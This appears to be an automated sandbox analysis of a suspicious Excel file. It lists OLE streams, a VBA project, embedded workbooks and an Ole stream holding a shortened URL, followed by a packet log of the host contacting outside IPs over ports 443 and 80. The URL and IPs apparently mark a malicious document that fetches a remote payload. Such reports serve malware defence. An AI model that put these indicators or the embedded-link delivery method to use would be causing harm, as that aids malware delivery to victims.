                          Stream Size:17987
                          Entropy:7.459551056433264
                          Base64 Encoded:True
                          Data ASCII:P K . . . . . . . . . . ! . . 4 v . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 c8 a3 cd 34 76 01 00 00 04 05 00 00 13 00 dd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0081AAFA/MBD00083EA7/\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:114
                          Entropy:4.219515110876372
                          Base64 Encoded:False
                          Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0081AAFA/MBD00083EA7/Package
                          CLSID:
                          File Type:Microsoft Excel 2007+
                          Stream Size:14238
                          Entropy:7.30552548787177
                          Base64 Encoded:True
                          Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0081AAFA/MBD000846C9/\x1CompObj
                          CLSID:
                          File Type:data
                          Stream Size:114
                          Entropy:4.25248375192737
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0081AAFA/MBD000846C9/\x5DocumentSummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:708
                          Entropy:3.6235698530352805
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 20 02 00 00 dc 01 00 00 14 00 00 00 01 00 00 00 a8 00 00 00 02 00 00 00 b0 00 00 00 03 00 00 00 bc 00 00 00 0e 00 00 00 c8 00 00 00 0f 00 00 00 d4 00 00 00 04 00 00 00 e0 00 00 00 05 00 00 00
                          General
                          Stream Path:MBD0081AAFA/MBD000846C9/\x5SummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:372
                          Entropy:2.913345911478729
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v i v i e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 1
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 44 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 02 00 00 00 90 00 00 00 03 00 00 00 9c 00 00 00 04 00 00 00 a8 00 00 00 05 00 00 00 b8 00 00 00 06 00 00 00 c4 00 00 00 07 00 00 00 d0 00 00 00 08 00 00 00 dc 00 00 00 09 00 00 00 ec 00 00 00
                          General
                          Stream Path:MBD0081AAFA/MBD000846C9/Workbook
                          CLSID:
                          File Type:Applesoft BASIC program data, first line number 16
                          Stream Size:97808
                          Entropy:7.365095307579232
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . .
                          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                          General
                          Stream Path:MBD0081AAFA/MBD0018D4CE/\x1Ole
                          CLSID:
                          File Type:data
                          Stream Size:20
                          Entropy:0.5689955935892812
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . .
                          Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0081AAFA/MBD0018D4CE/\x3ObjInfo
                          CLSID:
                          File Type:data
                          Stream Size:4
                          Entropy:0.8112781244591328
                          Base64 Encoded:False
                          Data ASCII:. . . .
                          Data Raw:00 00 03 00
                          General
                          Stream Path:MBD0081AAFA/MBD0018D4CE/Contents
                          CLSID:
                          File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                          Stream Size:197671
                          Entropy:6.989042939766534
                          Base64 Encoded:True
                          Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD0081AAFA/Workbook
                          CLSID:
                          File Type:Applesoft BASIC program data, first line number 16
                          Stream Size:386813
                          Entropy:7.815032759709734
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
                          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                          General
                          Stream Path:MBD0081AAFB/\x1Ole
                          CLSID:
                          File Type:data
                          Stream Size:780
                          Entropy:4.598662855485871
                          Base64 Encoded:False
                          Data ASCII:. . . . ^ 1 Q . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . s . . . d . e . e . m . o . s . . . c . o . m . / . f . N . s . C . o . 8 . x . A . ? . & . p . r . i . e . s . t . h . o . o . d . = . t . a . m . e . & . q . u . o . t . a . t . i . o . n . = . p . r . e . t . t . y . & . m . a . l . l . . . ] ~ k c p . . X . . + . } i ! : n . . . Z 3 B . . . . . . . . . . . . . . . . . . . d . F . f . f . T . 8 . G . S . p . S . 8 . R . v . F . f . W . 5 . c . P . G . 1 . C .
                          Data Raw:01 00 00 02 d5 5e 9a 31 8b 90 84 51 00 00 00 00 00 00 00 00 00 00 00 00 c6 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b c2 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 2e 00 64 00 65 00 65 00 6d 00 6f 00 73 00 2e 00 63 00 6f 00 6d 00 2f 00 66 00 4e 00 73 00 43 00 6f 00 38 00 78 00 41 00 3f 00 26 00 70 00 72 00 69 00 65 00 73 00 74 00 68 00 6f 00 6f 00
                          General
                          Stream Path:Workbook
                          CLSID:
                          File Type:Applesoft BASIC program data, first line number 16
                          Stream Size:434937
                          Entropy:7.999030413420103
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . E x @ ? [ [ H . \\ K . . N m r . { . . G . w ~ , S I . . . . . . . < ) . . . \\ . p . ? . i 8 . c - t O b . . R ` ? . . 4 ~ O v } Z . . . m B U . 7 : . U . . L # h L . . . U . 3 . . S . . ) ' y Y _ F h E . O P - . B . . . v a . . . < . . . = . . . a % . m . . . . } y + q . . . . . . . . j . . . . R . . . . . . . B , . . . = . . . . . S . < E A . ) ! @ . . . $ . . . . . " . . . v . . . . . . . . . . . . 1 . . . v . 7 . U . 7 i ] . } . . , H 1 . . . | = e A
                          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 b4 aa b1 45 78 40 88 de 3f 87 5b 5b f2 bb 48 df a6 bb 5c ac ab 4b 89 03 0d e4 4e 6d 72 0a 8b 7b cd a4 01 f4 bf c7 47 f5 e9 06 77 c8 7e 2c 53 49 e1 00 02 00 b0 04 c1 00 02 00 3c 29 e2 00 00 00 5c 00 70 00 a0 3f da e8 1e 69 38 17 63 2d 74 4f f4 62 b5 08 a9 85 1d 52 60 e1 e5 e4 b6 3f 0b 14 90 de
                          General
                          Stream Path:_VBA_PROJECT_CUR/PROJECT
                          CLSID:
                          File Type:ASCII text, with CRLF line terminators
                          Stream Size:525
                          Entropy:5.210919218372773
                          Base64 Encoded:True
                          Data ASCII:I D = " { 5 1 B 1 7 F E 7 - 0 A 2 E - 4 2 F 4 - A 7 E E - C 0 D 6 6 B A 6 B 4 D 8 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F 2 F 0 E 4 2 7 0 1 2 B 0 1 2 B 0
                          Data Raw:49 44 3d 22 7b 35 31 42 31 37 46 45 37 2d 30 41 32 45 2d 34 32 46 34 2d 41 37 45 45 2d 43 30 44 36 36 42 41 36 42 34 44 38 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                          General
                          Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                          CLSID:
                          File Type:data
                          Stream Size:104
                          Entropy:3.0488640812019017
                          Base64 Encoded:False
                          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                          Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                          CLSID:
                          File Type:data
                          Stream Size:2644
                          Entropy:3.978508048167349
                          Base64 Encoded:False
                          Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                          Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/dir
                          CLSID:
                          File Type:data
                          Stream Size:553
                          Entropy:6.3759364757172685
                          Base64 Encoded:True
                          Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
                          Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 fc ad 9a 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                          TimestampSource PortDest PortSource IPDest IP
                          Jan 16, 2025 08:26:17.081017971 CET49849443192.168.2.414.103.79.10
                          Jan 16, 2025 08:26:17.081085920 CET4434984914.103.79.10192.168.2.4
                          Jan 16, 2025 08:26:17.081161976 CET49849443192.168.2.414.103.79.10
                          Jan 16, 2025 08:26:17.081418991 CET49849443192.168.2.414.103.79.10
                          Jan 16, 2025 08:26:17.081444979 CET4434984914.103.79.10192.168.2.4
                          Jan 16, 2025 08:26:18.027245998 CET4434984914.103.79.10192.168.2.4
                          Jan 16, 2025 08:26:18.027378082 CET49849443192.168.2.414.103.79.10
                          Jan 16, 2025 08:26:18.031692982 CET49849443192.168.2.414.103.79.10
                          Jan 16, 2025 08:26:18.031738997 CET4434984914.103.79.10192.168.2.4
                          Jan 16, 2025 08:26:18.032265902 CET4434984914.103.79.10192.168.2.4
                          Jan 16, 2025 08:26:18.032329082 CET49849443192.168.2.414.103.79.10
                          Jan 16, 2025 08:26:18.032757998 CET49849443192.168.2.414.103.79.10
                          Jan 16, 2025 08:26:18.075376034 CET4434984914.103.79.10192.168.2.4
                          Jan 16, 2025 08:26:19.124367952 CET4434984914.103.79.10192.168.2.4
                          Jan 16, 2025 08:26:19.124419928 CET49849443192.168.2.414.103.79.10
                          Jan 16, 2025 08:26:19.124439001 CET4434984914.103.79.10192.168.2.4
                          Jan 16, 2025 08:26:19.124449015 CET4434984914.103.79.10192.168.2.4
                          Jan 16, 2025 08:26:19.124478102 CET49849443192.168.2.414.103.79.10
                          Jan 16, 2025 08:26:19.124499083 CET49849443192.168.2.414.103.79.10
                          Jan 16, 2025 08:26:19.135210991 CET49849443192.168.2.414.103.79.10
                          Jan 16, 2025 08:26:19.135225058 CET4434984914.103.79.10192.168.2.4
                          Jan 16, 2025 08:26:19.136696100 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.141645908 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.141732931 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.141917944 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.146756887 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.628907919 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.628921032 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.628948927 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.628959894 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.628969908 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.628981113 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.628992081 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.629003048 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.629019976 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.629033089 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.629107952 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.629137039 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.633903027 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.633914948 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.633927107 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.633971930 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.634006977 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.717915058 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.717937946 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.717952013 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.717967033 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.717978001 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.717983007 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.718019962 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.718019962 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.718142033 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.718154907 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.718167067 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.718188047 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.718231916 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.718496084 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.718516111 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.718529940 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.718542099 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.718549013 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.718558073 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.718566895 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.718578100 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.718602896 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.719387054 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.719404936 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.719418049 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.719430923 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.719439983 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.719446898 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.719449997 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.719480038 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.719558954 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.720232964 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.720252991 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.720267057 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.720280886 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.720285892 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.720298052 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.720314026 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.720330954 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.720354080 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.722954988 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.723010063 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.806592941 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.806674957 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.806718111 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.806730986 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.806741953 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.806751966 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.806761980 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.806771994 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.806771994 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.806782961 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.806807995 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.806809902 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.806818008 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.806823015 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.806829929 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.806848049 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.806853056 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.806859016 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.806869984 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.806879044 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.806879997 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.806902885 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.806916952 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.806926966 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.806956053 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.807480097 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.807491064 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.807501078 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.807511091 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.807521105 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.807526112 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.807535887 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.807539940 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.807544947 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.807557106 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.807564020 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.807566881 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.807591915 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.807612896 CET4986580192.168.2.4172.245.119.74
                          Jan 16, 2025 08:26:19.808186054 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.808202982 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.808213949 CET8049865172.245.119.74192.168.2.4
                          Jan 16, 2025 08:26:19.808223963 CET8049865172.245.119.74192.168.2.4
